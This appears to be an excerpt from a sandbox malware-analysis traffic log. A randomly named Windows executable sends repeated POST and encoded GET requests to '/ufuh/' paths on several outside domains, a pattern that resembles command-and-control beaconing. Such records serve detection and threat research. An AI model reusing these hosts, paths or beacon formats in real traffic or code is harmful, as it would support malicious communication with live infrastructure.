                                                                                            Origin: http://www.primeplay88.org
                                                                                            Referer: http://www.primeplay88.org/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:03.125252962 CEST | 208 | IN | HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
connection: close
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
May 2, 2024 08:28:03.125319958 CEST | 1576 | OUT |


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.22 | 49177 | 91.195.240.19 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:05.644785881 CEST | 468 | OUT | GET /ufuh/?pl=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Host: www.primeplay88.org
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:05.819519043 CEST | 208 | IN | HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
connection: close
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.22 | 49178 | 198.12.241.35 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:11.079615116 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Length: 2159
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Host: www.aceautocorp.com
Origin: http://www.aceautocorp.com
Referer: http://www.aceautocorp.com/ufuh/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:11.235708952 CEST | 112 | OUT |
May 2, 2024 08:28:11.458331108 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Thu, 02 May 2024 06:28:11 GMT
Server: Apache
X-Powered-By: PHP/8.1.28
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: br
Content-Length: 9730
Content-Type: text/html; charset=UTF-8
May 2, 2024 08:28:11.458353043 CEST | 1289 | IN |
May 2, 2024 08:28:11.458373070 CEST | 1289 | IN |
May 2, 2024 08:28:11.458434105 CEST | 1289 | IN |
May 2, 2024 08:28:11.458558083 CEST | 1289 | IN |
May 2, 2024 08:28:11.458573103 CEST | 1289 | IN |
May 2, 2024 08:28:11.458609104 CEST | 1289 | IN |
May 2, 2024 08:28:11.458674908 CEST | 1124 | IN |


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.22 | 49179 | 198.12.241.35 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:18.419702053 CEST | 729 | OUT | POST /ufuh/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Length: 199
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Host: www.aceautocorp.com
Origin: http://www.aceautocorp.com
Referer: http://www.aceautocorp.com/ufuh/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:18.663295031 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Thu, 02 May 2024 06:28:18 GMT
Server: Apache
X-Powered-By: PHP/8.1.28
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: br
Content-Length: 9730
Content-Type: text/html; charset=UTF-8
May 2, 2024 08:28:18.663326979 CEST | 1289 | IN |
May 2, 2024 08:28:18.663345098 CEST | 1289 | IN |
May 2, 2024 08:28:18.663357973 CEST | 1289 | IN |
May 2, 2024 08:28:18.663378000 CEST | 1289 | IN |
May 2, 2024 08:28:18.663393974 CEST | 1289 | IN |
May 2, 2024 08:28:18.663409948 CEST | 1289 | IN |
May 2, 2024 08:28:18.663425922 CEST | 1124 | IN |


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.22 | 49180 | 198.12.241.35 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:21.107579947 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Length: 3623
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Host: www.aceautocorp.com
Origin: http://www.aceautocorp.com
Referer: http://www.aceautocorp.com/ufuh/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:21.263585091 CEST | 1576 | OUT |
                                                                                            May 2, 2024 08:28:21.503128052 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 02 May 2024 06:28:21 GMT
                                                                                            Server: Apache
                                                                                            X-Powered-By: PHP/8.1.28
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: br
                                                                                            Content-Length: 9730
                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            17 | 192.168.2.22 | 49181 | 198.12.241.35 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            May 2, 2024 08:28:23.793699026 CEST | 468 | OUT | GET /ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.aceautocorp.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:28:23.986429930 CEST | 548 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 02 May 2024 06:28:23 GMT
                                                                                            Server: Apache
                                                                                            X-Powered-By: PHP/8.1.28
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Location: http://aceautocorp.com/ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&5h1t=6H6PKFvXjtI4u8k
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Length: 0
                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            18 | 192.168.2.22 | 49182 | 183.111.183.31 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            May 2, 2024 08:28:32.325015068 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.mrart.co.kr
                                                                                            Origin: http://www.mrart.co.kr
                                                                                            Referer: http://www.mrart.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:28:33.182195902 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:28:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            19 | 192.168.2.22 | 49183 | 183.111.183.31 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            May 2, 2024 08:28:35.127638102 CEST | 717 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.mrart.co.kr
                                                                                            Origin: http://www.mrart.co.kr
                                                                                            Referer: http://www.mrart.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:28:35.684334993 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:28:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.22 | 49184 | 183.111.183.31 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:38.723397017 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.mrart.co.kr
                                                                                            Origin: http://www.mrart.co.kr
                                                                                            Referer: http://www.mrart.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:39.597989082 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:28:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.22 | 49185 | 183.111.183.31 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:41.519541979 CEST | 464 | OUT | GET /ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.mrart.co.kr
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:42.050122976 CEST | 502 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:28:41 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://mrart.co.kr/ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&5h1t=6H6PKFvXjtI4u8k


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.22 | 49186 | 67.223.117.189 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:47.335522890 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.touchclean.top
                                                                                            Origin: http://www.touchclean.top
                                                                                            Referer: http://www.touchclean.top/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:47.827896118 CEST | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                            Date: Thu, 02 May 2024 06:28:47 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.22 | 49187 | 67.223.117.189 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:56.619167089 CEST | 726 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.touchclean.top
                                                                                            Origin: http://www.touchclean.top
                                                                                            Referer: http://www.touchclean.top/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:56.909734964 CEST | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                            Date: Thu, 02 May 2024 06:28:56 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.22 | 49188 | 67.223.117.189 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:59.305978060 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.touchclean.top
                                                                                            Origin: http://www.touchclean.top
                                                                                            Referer: http://www.touchclean.top/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:28:59.758326054 CEST | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                            Date: Thu, 02 May 2024 06:28:59 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.22 | 49189 | 67.223.117.189 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:29:01.993967056 CEST | 467 | OUT | GET /ufuh/?pl=A8fQf/hISgzwL3oVRnqHbZBV/plXIsny1TYZTQxVDrtx1SbFVUn9YIU/QNlk/lJ+xLSyvfTMvWvwfwkJSN9/6ikOA0zWpJ/i6bk9+sgLcEv6BHfAlNSdkle4dEVn&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.touchclean.top
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:29:02.288319111 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 02 May 2024 06:29:02 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 32106
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=utf-8


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            26 | 192.168.2.22 | 49190 | 154.41.250.58 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            May 2, 2024 08:29:08.842675924 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.ibistradingco.com
                                                                                            Origin: http://www.ibistradingco.com
                                                                                            Referer: http://www.ibistradingco.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:29:09.161247969 CEST | 1215 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Server: hcdn
                                                                                            Date: Thu, 02 May 2024 06:29:09 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 795
                                                                                            Connection: close
                                                                                            location: https://www.ibistradingco.com/ufuh/
                                                                                            platform: hostinger
                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            x-hcdn-request-id: a54f67c612fa70fbcea8d17f71763a4a-bos-edge1
                                                                                            x-hcdn-cache-status: DYNAMIC
                                                                                            x-hcdn-upstream-rt: 0.132


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            27 | 192.168.2.22 | 49191 | 154.41.250.58 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            May 2, 2024 08:29:11.456959963 CEST | 735 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.ibistradingco.com
                                                                                            Origin: http://www.ibistradingco.com
                                                                                            Referer: http://www.ibistradingco.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:29:11.683789968 CEST | 1215 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Server: hcdn
                                                                                            Date: Thu, 02 May 2024 06:29:11 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 795
                                                                                            Connection: close
                                                                                            location: https://www.ibistradingco.com/ufuh/
                                                                                            platform: hostinger
                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            x-hcdn-request-id: 06774e0986593b81910e21be858c9502-bos-edge3
                                                                                            x-hcdn-cache-status: DYNAMIC
                                                                                            x-hcdn-upstream-rt: 0.133


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            28 | 192.168.2.22 | 49192 | 154.41.250.58 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            May 2, 2024 08:29:14.084063053 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.ibistradingco.com
                                                                                            Origin: http://www.ibistradingco.com
                                                                                            Referer: http://www.ibistradingco.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:29:14.407983065 CEST | 1215 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Server: hcdn
                                                                                            Date: Thu, 02 May 2024 06:29:14 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 795
                                                                                            Connection: close
                                                                                            location: https://www.ibistradingco.com/ufuh/
                                                                                            platform: hostinger
                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            x-hcdn-request-id: 1a31ccf64c83a1f6fc09f744dcc4345a-bos-edge1
                                                                                            x-hcdn-cache-status: DYNAMIC
                                                                                            x-hcdn-upstream-rt: 0.137


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            29 | 192.168.2.22 | 49193 | 154.41.250.58 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            May 2, 2024 08:29:16.698314905 CEST | 470 | OUT | GET /ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.ibistradingco.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:29:16.926501989 CEST | 1289 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Server: hcdn
